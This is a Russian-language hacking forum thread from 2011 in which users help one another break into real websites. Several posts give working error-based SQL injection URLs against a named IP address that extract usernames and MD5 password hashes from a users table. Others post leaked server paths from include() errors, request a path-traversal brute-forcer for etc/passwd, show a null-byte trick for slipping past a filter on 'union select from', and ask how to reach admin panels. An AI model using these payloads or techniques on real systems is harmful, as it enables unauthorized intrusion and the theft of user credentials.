22.03.2011, 20:49
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
С нами:
11217866
Репутация:
3812
|
|
Сообщение от Konfuz™
Есть ли возможность заюзать SQL Inection в данном случае? На месте &dt должна быть дата например 2011-03-19
Есть. Без особых даже проблем. Кури маны.
Сообщение от Oro4imaru
в базе нашел пас ид №1 нашел админку а войти не могу так как логина нет. что делать подскажыте????
Искать логин в другой таблице как вариант. id же тебе известен.
__________________
|
|
|
22.03.2011, 22:09
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Сообщение от None
не могу заюзать SQL Inj
Помоему там ограничение на длину запроса. потому и не получается ничего)
|
|
|
|
23.03.2011, 01:33
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8412128
Репутация:
0
|
|
Есть SQL Injection
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Меняем LIMIT 0,1 - получаем 158 пользователей...
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?
|
|
|
|
23.03.2011, 01:43
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от Konfuz™
Есть SQL Injection
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `name` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Меняем LIMIT 0,1 - получаем 158 пользователей...
http://95.215.1.82/stat.php?id=' AND '0' OR 1 GROUP BY CONCAT((SELECT `pass` FROM `users` LIMIT 0,1),RAND(0)|0) HAVING MIN(0)--
Первые 3 пользователя выводит md5 пароль, остальные нет... В чем может быть беда?
http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1
|
|
|
|
23.03.2011, 01:45
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
С нами:
8412128
Репутация:
0
|
|
Сообщение от None
http://95.215.1.82/stat.php?id=' and '0' or 1 group by concat((select count(pass) from users),rand(0)|0) having sum(0)-- 1
я уже увидел что всего 3 пароля, как такое может быть?
Какие есть варианты? Пароли лежат где-то еще?
|
|
|
|
23.03.2011, 01:48
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от Konfuz™
я уже увидел что всего 3 пароля, как такое может быть?
Колонке не присвоено not null при создании. Следовательно, они могут быть пустыми.
|
|
|
|
23.03.2011, 02:38
|
|
Новичок
Регистрация: 21.01.2010
Сообщений: 0
С нами:
8580980
Репутация:
0
|
|
Есть вот такие штуки:
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Warning[/COLOR][COLOR="#007700"]: include([/COLOR][COLOR="#0000BB"]service[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]php[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#DD0000"]') [function.include]: failed to open stream: No such file or directory in /home/corpxcoz/public_html/321.co.za/home.php on line 111
-------
Warning: include(templates/default/testimonials_browse.php\') [function.include]: failed to open stream: No such file or directory in /home/pmagic/public_html/helpdesk/index.php on line 82
----------------
Warning: include(/homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/templates/default/knowledgebase_browse.php\') [function.include]: failed to open stream: No such file or directory in /homepages/12/d281576965/htdocs/Lucid IT/components/com_pro_desk/support/index.php on line 85
[/COLOR][/COLOR]
И т.д.
Подкинье брутер etc/passwd, passwd%00, который перебирает пути ../, ../../, ../../../ и т.д на валид.
Желательно на перле или питоне. Спасибо. |
|
|
|
23.03.2011, 03:00
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от DCrypt
Подкинье брутер etc/passwd, passwd%00
Посчитай кол-во каталогов от корня до исходного файла исходя из ошибки.
|
|
|
|
23.03.2011, 03:32
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Не пропускает запросы, где есть union select from. Просто union select - все норм, при добавление from - еррор. /*!union*/ /*!select*/ /*!from*/ не прокатило /*!union+select*/ fromтоже. Изменение регистров не вариант. Есть какие-нибудь предложения?
Проблема решена.
Обошел так:
uni%00on sele%00ct from
|
|
|
|
23.03.2011, 10:41
|
|
Новичок
Регистрация: 17.07.2010
Сообщений: 16
С нами:
8327126
Репутация:
0
|
|
не могу найти логин админа в панель в базах нет, автор новостей скрыт, на сайте не нашел ?????
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
